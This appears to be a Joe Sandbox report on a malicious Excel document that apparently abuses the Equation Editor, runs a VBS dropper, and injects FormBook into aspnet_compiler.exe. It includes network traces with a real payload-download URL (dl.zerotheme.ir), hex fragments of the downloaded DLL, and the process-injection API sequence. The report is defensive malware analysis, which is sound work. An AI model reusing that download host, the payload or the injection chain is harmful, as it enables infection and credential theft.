                                                        2024-09-27 08:27:42 UTC16384INData Raw: db 39 51 fa d2 db 4c e8 df 54 17 f3 63 16 b9 cb 11 45 56 6e 39 69 1e f4 9a 6c 24 fc 72 20 5e 34 7f 3d ff d8 5f e9 94 a3 fa 64 af 9f 42 25 35 13 3d 43 78 fb 51 ab 76 d3 62 82 dd e1 3c d8 c4 21 59 f1 d0 2a f6 c7 26 ef 61 cf c3 63 89 7b 53 d6 48 48 4d 67 62 41 85 9f e1 34 a2 50 fd e3 58 4e 4b 36 3d d7 b5 ff bc 32 b2 01 5a a9 93 1a cf 54 b3 be 40 d8 b2 e8 b2 a1 6a 37 a5 1a d6 6a ac 2f d9 e1 64 a0 41 21 94 c6 cc d4 6b 49 7e 68 3d 0e 57 48 69 75 e3 22 ee 16 f0 8a 96 87 e4 92 9d 1f 5e 74 b3 b2 4c 26 e7 cd c7 c1 c6 17 af 2b f2 78 8b 45 1e 28 b2 83 6d 5a c6 f1 b9 17 24 48 59 17 3b b3 f3 58 62 a7 dc 47 a2 33 39 aa 94 e8 c0 8e e2 a4 a2 30 f8 92 c5 51 98 a7 b3 de 96 5f f6 b2 38 75 e6 df 32 b1 9d a8 19 1a 59 a4 3d ef 20 ea 44 09 dc e4 17 6c 30 8d 91 c1 aa 91 d9 38 38
                                                        Data Ascii: 9QLTcEVn9il$r ^4=_dB%5=CxQvb<!Y*&ac{SHHMgbA4PXNK6=2ZT@j7j/dA!kI~h=WHiu"^tL&+xE(mZ$HY;XbG390Q_8u2Y= Dl088
                                                        2024-09-27 08:27:42 UTC16384INData Raw: af 51 55 28 42 0e 63 9d 55 f7 33 c7 7f 20 a7 6b 65 86 2b 11 70 e9 37 54 37 2b f0 59 1d d9 29 fc 37 b4 ea 67 a9 ec 77 94 29 72 c6 58 d4 a0 2f 4b df a0 a7 19 78 32 f1 4f c8 a0 34 23 4a 3d 50 95 19 76 b0 d2 22 2b 2f e1 e8 af 49 fb 2d c0 35 9b f2 66 fe da b3 27 1d 7f 91 e4 12 a8 00 d9 4d b8 ef bd 1a 14 b4 03 c5 72 32 a9 0b 7f d9 4f b1 72 50 cb a7 ec 5a 81 3a 7d b0 49 df c4 8a 38 c1 29 ee 0f f9 b0 db 2d b2 3d 4f 41 ba f5 20 b1 64 c8 e8 8a ab 2f de 8d b5 ba d4 a1 ab 1d 1d 21 fc 66 f6 f1 c0 6b 43 7b 22 b6 67 e3 6e 3b 1e 57 7b 79 9c 67 b4 79 61 91 a6 03 21 b3 f2 e3 c5 c6 dc 38 4a b2 ec 09 41 8d b8 74 0e 03 43 88 42 d8 8b 0d 3f 90 42 7b 66 da 9b e5 d2 a6 ff 84 df 52 8e bd fd 06 eb 07 57 ad 46 47 0f 8a c5 7b a8 b6 65 3d e4 6f de 6c eb bc 9b 08 1a 57 f9 77 f6 ac d4
                                                        Data Ascii: QU(BcU3 ke+p7T7+Y)7gw)rX/Kx2O4#J=Pv"+/I-5f'Mr2OrPZ:}I8)-=OA d/!fkC{"gn;W{ygya!8JAtCB?B{fRWFG{e=olWw
                                                        2024-09-27 08:27:42 UTC16384INData Raw: 55 fb 28 ea 05 41 42 0f 18 00 4f 0e 2c 8b c2 70 2a 15 ad f4 1b f8 30 fd f6 9d 71 a0 56 fd c7 4a 65 d1 9d f9 cb ca 6f 3e e7 b0 c5 34 64 e0 2f e1 12 71 27 0c 24 63 e0 0e 4d b2 4e 8a c2 cd 77 64 5f ef 30 95 fa db af 01 eb 32 56 9e c1 b5 5b e3 d8 14 22 56 bf f0 5d 2c e0 ee 34 48 54 af f3 de e8 49 74 08 d1 70 28 17 73 c7 d8 cc b9 94 d7 3b 27 08 9d 0a ac 17 ab 51 c0 59 26 f8 f0 ac 33 b6 78 18 07 be a0 f1 24 e6 e4 c1 85 c5 02 c9 63 bb 4b 50 1b 64 d0 e0 10 bf aa 78 2e 76 1a 5d 5f 62 14 8f 28 fc 02 13 12 c0 61 c8 5b b0 b1 6d 9d f6 fa 8b f0 2e 7e 17 0d 55 45 a7 b0 01 f7 f6 78 fb 9f 77 3e a3 8a d9 b4 f3 41 ec 37 25 36 46 bf d9 80 d2 ce 65 8c 84 00 46 58 b0 00 eb cd 8e c5 be 30 d1 0c e5 ab 09 ab 03 9d 79 3d f7 56 20 15 13 5e 6e 92 7c 80 e4 51 5b 20 04 02 db 1f 48 dc
                                                        Data Ascii: U(ABO,p*0qVJeo>4d/q'$cMNwd_02V["V],4HTItp(s;'QY&3x$cKPdx.v]_b(a[m.~UExw>A7%6FeFX0y=V ^n|Q[ H
                                                        2024-09-27 08:27:42 UTC16384INData Raw: 33 2f 6e 25 42 80 db eb 74 b0 ae 6e 26 a9 c6 ea e2 85 af 3a 87 fd 9d a6 a9 04 f1 2e 0b ad 57 c3 43 36 bd f7 29 dc 71 b0 de 93 c0 86 6a 0f 09 4d 29 27 95 c2 80 49 7c 65 1e 4e cc a0 69 20 b9 50 27 b8 88 a8 4b d1 3b c0 82 23 f2 0d 66 c7 6a cd ed 45 9f 90 88 9a 2b 45 50 4c 33 a1 05 33 fe 95 9e 19 37 38 1a 54 45 ad 34 c0 38 0b 87 4f fd 6b 41 20 90 31 42 b0 34 e9 91 89 66 3f bb 41 23 8d 3f b3 0c 55 c6 c2 fd 4d 20 ba 15 a7 df ec 89 ff 94 d9 f3 21 cf e1 ce 78 87 ef 22 01 de 5f 17 a7 f4 98 2b 00 99 1a 37 91 07 dc 79 51 20 ef 8d 16 57 9c 28 ce e3 4d 42 f6 5d 46 7d ad d0 68 17 61 c9 7b f2 4d 02 83 d5 22 8e 7e 32 4a 01 49 a5 3a 2b 3b ee 3f 03 12 00 7d 2a 5a f4 0e 0e ab 58 88 43 1c 15 0e f2 2b 2c ec 36 a5 c2 f9 e7 79 e9 65 fd 2c 9a f9 b8 7f be f8 f0 00 a8 29 c6 a7 b5
                                                        Data Ascii: 3/n%Btn&:.WC6)qjM)'I|eNi P'K;#fjE+EPL3378TE48OkA 1B4f?A#?UM !x"_+7yQ W(MB]F}ha{M"~2JI:+;?}*ZXC+,6ye,)
                                                        2024-09-27 08:27:42 UTC16384INData Raw: 06 39 e1 22 dd ed b8 ec fa 8b 9f 87 74 42 83 ad a7 3a 6e b0 5a 9f e8 60 a0 2c 57 07 ad d0 31 94 82 15 8a 3e d8 09 b3 a1 2e 55 81 cb 51 c8 fe 48 92 4b bb 3e 4d 35 8f dd e5 3e 33 bd 51 25 15 db c3 60 20 27 4d f3 9e 3b 8a 2b ba ff ff 21 0d 56 48 1c 36 fc 70 d1 46 ff 40 b6 51 54 95 d9 74 78 0f 12 4c a4 cd 08 53 55 00 b4 ce 41 22 86 02 de 5c a4 74 d8 a8 89 e3 bf b5 77 04 00 a7 0a 0e 6a 8d bd fa b6 02 e2 79 e5 c7 04 3c ba 38 ee 54 35 31 b1 72 20 f9 41 3e f4 69 12 c4 73 e8 e9 f3 78 28 a5 63 fc 92 4e 1e fb f1 a8 ab a8 b2 da 4c 0a 45 42 c1 64 88 0c 5a 37 1b 37 08 1a 33 2f 8d 19 d4 d5 f0 eb c0 83 4a 3f 6d b9 cc ab c7 2f a5 6a 3c e9 33 47 f3 d8 76 d9 cf 4d 40 e6 bd b9 7e a2 22 bf 9f 4a fe 84 e9 6f e1 ad 61 03 b2 90 8f 0a f1 fa d2 3d e1 8d 47 e4 45 d9 8c 28 71 57 50
                                                        Data Ascii: 9"tB:nZ`,W1>.UQHK>M5>3Q%` 'M;+!VH6pF@QTtxLSUA"\twjy<8T51r A>isx(cNLEBdZ773/J?m/j<3GvM@~"Joa=GE(qWP


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.2249174185.18.213.204434016C:\Users\user\AppData\Local\Temp\temp_executable.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:43 UTC66OUTGET /kokorila/cgl-bin/DLLL.dll HTTP/1.1
                                                        Host: dl.zerotheme.ir
                                                        2024-09-27 08:27:44 UTC206INHTTP/1.1 200 OK
                                                        Connection: close
                                                        content-type: application/x-msdownload
                                                        last-modified: Thu, 26 Sep 2024 04:42:14 GMT
                                                        accept-ranges: bytes
                                                        content-length: 15360
                                                        date: Fri, 27 Sep 2024 08:27:44 GMT
                                                        2024-09-27 08:27:44 UTC1162INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 f9 da 66 00 00 00 00 00 00 00 00 e0 00 2e 20 0b 01 30 00 00 34 00 00 00 38 00 00 00 00 00 00 2e 53 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxf. 048.S `@ `
                                                        2024-09-27 08:27:44 UTC14198INData Raw: 00 00 06 12 00 28 06 00 00 06 25 26 1f 60 28 10 00 00 06 fe 01 13 16 11 16 2c 10 1a 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 11 05 11 08 fe 01 13 17 11 17 2c 30 00 09 7b 01 00 00 04 11 08 28 08 00 00 06 25 26 1f 64 28 10 00 00 06 fe 03 13 18 11 18 2c 10 1d 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 00 04 11 04 1f 68 28 10 00 00 06 58 28 18 00 00 0a 25 26 13 09 04 11 04 1f 6c 28 10 00 00 06 58 28 18 00 00 0a 13 0a 1f 70 28 10 00 00 06 13 0b 09 7b 01 00 00 04 11 05 11 09 1f 74 28 10 00 00 06 1f 78 28 10 00 00 06 28 09 00 00 06 13 0c 05 2d 0d 11 0c 1f 7c 28 10 00 00 06 fe 01 2b 0a 20 80 00 00 00 28 10 00 00 06 13 19 11 19 2c 47 1d 45 01 00 00 00 f6 ff ff ff 00 20 84 00 00 00 28 10 00 00 06 13 0b 09 7b 01 00 00 04 20 88 00 00 00 28 10 00 00 06 11 09 20
                                                        Data Ascii: (%&`(,Esz,0{(%&d(,Eszh(X(%&l(X(p({t(x((-|(+ (,GE ({ (


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:04:26:22
                                                        Start date:27/09/2024
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                        Imagebase:0x13f260000
                                                        File size:28'253'536 bytes
                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:04:27:15
                                                        Start date:27/09/2024
                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                        Imagebase:0x13f5c0000
                                                        File size:1'423'704 bytes
                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:04:27:33
                                                        Start date:27/09/2024
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543'304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:04:27:35
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
                                                        Imagebase:0x40000
                                                        File size:141'824 bytes
                                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:04:27:37
                                                        Start date:27/09/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                                                        Imagebase:0xbe0000
                                                        File size:49'152 bytes
                                                        MD5 hash:3E01AC27E853080CA5C92470DF3F738C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 21%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:04:27:44
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                        Imagebase:0xac0000
                                                        File size:55'384 bytes
                                                        MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Disassembly

                                                        Code Analysis

                                                        Call Graph

                                                        • Entrypoint
                                                        • Decryption Function
                                                        • Executed
                                                        • Not Executed
                                                        • Show Help
                                                        callgraph 1 Error: Graph is empty

                                                        Module: Sheet1

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Sheet1"

                                                        2

                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Module: Sheet2

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Sheet2"

                                                        2

                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Module: Sheet3

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Sheet3"

                                                        2

                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Module: ThisWorkbook

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "ThisWorkbook"

                                                        2

                                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:21.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:17
                                                          Total number of Limit Nodes:2
                                                          execution_graph 4407 1d8e68 VirtualAllocEx 4408 1d8f1f 4407->4408 4399 1d90b0 ResumeThread 4400 1d9138 4399->4400 4401 1d8d50 ReadProcessMemory 4402 1d8e0f 4401->4402 4403 1d8f70 4404 1d8fee WriteProcessMemory 4403->4404 4405 1d8fd9 4403->4405 4406 1d9050 4404->4406 4405->4404 4409 1d88c0 4410 1d894d CreateProcessW 4409->4410 4412 1d8ab4 4410->4412 4412->4412 4413 1d8c40 4414 1d8c9e 4413->4414 4415 1d8cb3 Wow64SetThreadContext 4413->4415 4414->4415 4416 1d8cfc 4415->4416

                                                          Executed Functions

                                                          Function 001D7055 Relevance: 1.8, Instructions: 1847COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 1d7055-1d7058 1 1d705a-1d705f 0->1 2 1d7061-1d7439 0->2 1->2 6 1d743b 2->6 7 1d7440-1d75ae call 1d6fc0 * 3 2->7 6->7 21 1d7618-1d76ca call 1d6fc0 * 2 call 1d5bfc call 1d6fc0 7->21 22 1d75b0-1d75b7 7->22 37 1d76cc-1d76d3 21->37 38 1d76fb-1d77e5 call 1d6fc0 * 5 21->38 22->22 24 1d75b9-1d75be 22->24 26 1d75d0-1d7612 24->26 27 1d75c0-1d75ca 24->27 26->21 27->26 37->37 40 1d76d5-1d76f0 37->40 55 1d77ec-1d7831 call 1d6fc0 38->55 56 1d77e7 38->56 40->38 60 1d78b4-1d78fb call 1d5c14 call 1d6fc0 55->60 61 1d7837-1d783e 55->61 56->55 70 1d78fd-1d7904 60->70 71 1d792c-1d7957 call 1d6fc0 60->71 61->61 63 1d7840-1d7888 call 1d5c08 call 1d6fc0 61->63 73 1d788a-1d78a5 63->73 74 1d78b0-1d78b2 63->74 70->70 76 1d7906-1d7921 70->76 79 1d795e-1d7a28 call 1d6fc0 * 3 call 1d5c20 call 1d6fc0 71->79 80 1d7959 71->80 73->74 74->71 76->71 94 1d7a59-1d7a75 79->94 95 1d7a2a-1d7a31 79->95 80->79 97 1d7aee-1d7c1b call 1d6fc0 * 5 call 1d5c38 94->97 98 1d7a77-1d7abc call 1d5c2c call 1d6fc0 94->98 95->95 96 1d7a33-1d7a4e 95->96 96->94 124 1d7c1d-1d7c52 call 1d6fc0 97->124 125 1d7c54-1d7c5e call 1d6fc0 97->125 108 1d7aed 98->108 109 1d7abe-1d7ac5 98->109 108->97 109->109 111 1d7ac7-1d7ae2 109->111 111->108 130 1d7c64-1d7c78 124->130 125->130 131 1d7c7e-1d7c85 130->131 132 1d7d21-1d7d5c call 1d6fc0 130->132 131->131 133 1d7c87-1d7d20 call 1d6fc0 * 4 call 1d5c38 131->133 138 1d7d8d-1d7dde call 1d5c44 call 1d6fc0 132->138 139 1d7d5e-1d7d65 132->139 133->132 152 1d7e0f-1d7ea4 call 1d6fc0 * 3 138->152 153 1d7de0-1d7de7 138->153 139->139 140 1d7d67-1d7d82 139->140 140->138 167 1d817e-1d81f3 call 1d6fc0 * 2 152->167 153->153 156 1d7de9-1d7e04 153->156 156->152 172 1d7ea9-1d7fd1 call 1d6fc0 * 4 167->172 173 1d81f9-1d8200 167->173 200 1d7fd7-1d80b4 call 1d6fc0 * 2 call 1d6f78 call 1d6fc0 call 1d5c44 172->200 201 1d8121-1d8178 call 1d6fc0 * 2 172->201 173->173 175 1d8202-1d82c7 call 1d6fc0 * 2 call 1d5c44 call 1d6fc0 173->175 193 1d82c9-1d82d0 175->193 194 1d82f8-1d8357 call 1d6fc0 175->194 193->193 196 1d82d2-1d82ed 193->196 206 1d8359-1d8360 194->206 207 1d836b-1d83a2 call 1d6fc0 194->207 196->194 234 1d80b9-1d80ef call 1d6fc0 200->234 201->167 206->206 211 1d8362-1d8365 206->211 218 1d83a9-1d83e7 call 1d6fc0 207->218 219 1d83a4 207->219 211->207 228 1d845d-1d84a4 call 1d6ff4 call 1d6fc0 218->228 229 1d83e9-1d83f6 call 1d5c50 218->229 219->218 242 1d84d5-1d84db call 1d7000 228->242 243 1d84a6-1d84ad 228->243 233 1d83fb-1d8431 call 1d6fc0 229->233 244 1d8459-1d845b 233->244 245 1d8433-1d844e 233->245 246 1d80f1-1d80f8 234->246 247 1d8120 234->247 252 1d84e0-1d8516 call 1d6fc0 242->252 243->243 248 1d84af-1d84ca 243->248 244->242 245->244 246->246 250 1d80fa-1d8115 246->250 247->201 248->242 250->247 259 1d8518-1d851f 252->259 260 1d8547-1d8605 call 1d6fc0 252->260 259->259 263 1d8521-1d853c 259->263 263->260
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3fd15d48e2c8815c640468b9469a3998e2c1a9413ccafb1f64ffff0256821043
                                                          • Instruction ID: a59894c91ce56fe6314dab8777d77480f5b0d3dc53a1acfc7b3e12063a767d4c
                                                          • Opcode Fuzzy Hash: 3fd15d48e2c8815c640468b9469a3998e2c1a9413ccafb1f64ffff0256821043
                                                          • Instruction Fuzzy Hash: A3A2AC74A012288FDB65DF68C894BDDBBB5AB49300F1085EAE50CA7395DB34AF85CF50
                                                          Function 001D2108 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 1d2108-1d2133 322 1d213a-1d21c7 321->322 323 1d2135 321->323 326 1d221f-1d2273 322->326 327 1d21c9-1d21d0 322->327 323->322 337 1d2276-1d22c6 326->337 327->327 328 1d21d2-1d21d7 327->328 330 1d21d9-1d21e3 328->330 331 1d21e6-1d221d 328->331 330->331 331->337 341 1d25d9-1d25f4 call 1d1268 337->341 344 1d22cb-1d22d7 341->344 345 1d25fa-1d2601 341->345 347 1d22de-1d2333 call 1d1310 call 1d1340 344->347 348 1d22d9 344->348 345->345 346 1d2603-1d260a 345->346 354 1d2381-1d2387 347->354 348->347 355 1d2389-1d2409 354->355 356 1d2335-1d2350 354->356 365 1d240b-1d2412 355->365 366 1d2444-1d2448 355->366 357 1d2357-1d237e 356->357 358 1d2352 356->358 357->354 358->357 365->365 367 1d2414-1d243e 365->367 368 1d247a-1d247e 366->368 369 1d244a-1d2474 366->369 367->366 370 1d24b0-1d24b4 368->370 371 1d2480-1d24aa 368->371 369->368 372 1d24e6-1d24ea 370->372 373 1d24b6-1d24e0 370->373 371->370 374 1d24ec-1d24f4 372->374 375 1d2534-1d25a0 372->375 373->372 376 1d252c-1d2532 374->376 381 1d25a7-1d25d6 375->381 376->375 377 1d24f6-1d2529 376->377 377->376 381->341
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p!p
                                                          • API String ID: 0-1147775804
                                                          • Opcode ID: 813c8f44e55f1f815b530c57b6dddd2f6115d7ca0b54e1a22e64812e3625e07f
                                                          • Instruction ID: 2e4bd5658e8ba5cb1ff34ea5c0f6985faca78c6acb7a425f2f75263e8c82e8f4
                                                          • Opcode Fuzzy Hash: 813c8f44e55f1f815b530c57b6dddd2f6115d7ca0b54e1a22e64812e3625e07f
                                                          • Instruction Fuzzy Hash: 5F02B079A00218DFDB15CFA5D984E99BBB2FF49300F1581A9E509AB332DB31E991DF10
                                                          Function 001D6721 Relevance: .6, Instructions: 570COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 443 1d6721-1d6764 444 1d676b-1d6848 443->444 445 1d6766 443->445 447 1d685f-1d6863 444->447 445->444 448 1d684a-1d685c 447->448 449 1d6865-1d686c 447->449 448->447 449->449 450 1d686e-1d6873 449->450 451 1d6885-1d68b2 450->451 452 1d6875-1d687f 450->452 456 1d68b8-1d68bf 451->456 457 1d6d5a-1d6d61 451->457 452->451 456->456 460 1d68c1-1d698f 456->460 458 1d6d67-1d6d6e 457->458 459 1d6e91-1d6e98 457->459 461 1d6dce-1d6e2d call 1d1e6c 458->461 462 1d6d70-1d6d7a 458->462 463 1d6e9a-1d6ea1 459->463 464 1d6ec7-1d6efe 459->464 500 1d69c6-1d69d2 460->500 491 1d6e33-1d6e5a 461->491 465 1d6d7c-1d6d83 462->465 466 1d6dbb-1d6dc8 462->466 463->463 468 1d6ea3-1d6ec4 463->468 479 1d6f0b-1d6f0e 464->479 480 1d6f00-1d6f02 464->480 465->465 470 1d6d85-1d6db9 465->470 466->461 470->461 485 1d6f15-1d6f5f 479->485 486 1d6f10 479->486 482 1d6f09 480->482 483 1d6f04 480->483 482->485 483->482 486->485 495 1d6e5c-1d6e63 491->495 496 1d6e7e-1d6e84 491->496 495->495 498 1d6e65-1d6e78 495->498 496->491 499 1d6e86-1d6e8b 496->499 498->496 499->459 501 1d69d4-1d69d8 500->501 502 1d6991-1d699d 500->502 503 1d6a0e-1d6a29 501->503 504 1d69da-1d69e1 501->504 505 1d699f 502->505 506 1d69a4-1d69b0 502->506 513 1d6a99-1d6ab4 503->513 514 1d6a2b-1d6a32 503->514 504->504 507 1d69e3-1d6a08 504->507 505->506 508 1d69c3 506->508 509 1d69b2-1d69b9 506->509 507->503 508->500 509->509 511 1d69bb-1d69c1 509->511 511->501 521 1d6ab9-1d6b62 513->521 514->514 515 1d6a34-1d6a3e 514->515 518 1d6a86-1d6a93 515->518 519 1d6a40-1d6a47 515->519 518->513 519->519 520 1d6a49-1d6a84 519->520 520->513 531 1d6bd1-1d6c0b 521->531 533 1d6c0d 531->533 534 1d6c1f-1d6d54 531->534 535 1d6b64-1d6bce 533->535 536 1d6c13-1d6c19 533->536 534->457 535->531 536->534 536->535
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab46ea33fad4ced5eb52bb16cb9a73103acd67f7f68484e7b60216b76976b0cd
                                                          • Instruction ID: 48eae647733e1da82a5c020aca00ef4806feadac738153cb6798ab52d772b231
                                                          • Opcode Fuzzy Hash: ab46ea33fad4ced5eb52bb16cb9a73103acd67f7f68484e7b60216b76976b0cd
                                                          • Instruction Fuzzy Hash: A4429374A012188FDB64DF69D994B99BBF1FF49300F1191EAE909A7361DB309E85CF10
                                                          Function 001D28E0 Relevance: .5, Instructions: 513COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b61489a1d16bd49ea7a393883a82bbbfccc5e7690cd74869d4ba3ab19ecfc9b5
                                                          • Instruction ID: 69551f516a0e991e973ca2a1bb85c63915d41a01f3d8856655ec1f4acedb0720
                                                          • Opcode Fuzzy Hash: b61489a1d16bd49ea7a393883a82bbbfccc5e7690cd74869d4ba3ab19ecfc9b5
                                                          • Instruction Fuzzy Hash: E7328074E042298FDB64CF65DD84B9DBBB2BB99300F1091AAE819A7760DB705EC5CF10
                                                          Function 001D88B6 Relevance: 1.7, APIs: 1, Instructions: 238processCOMMON
                                                          Download Yara Rule

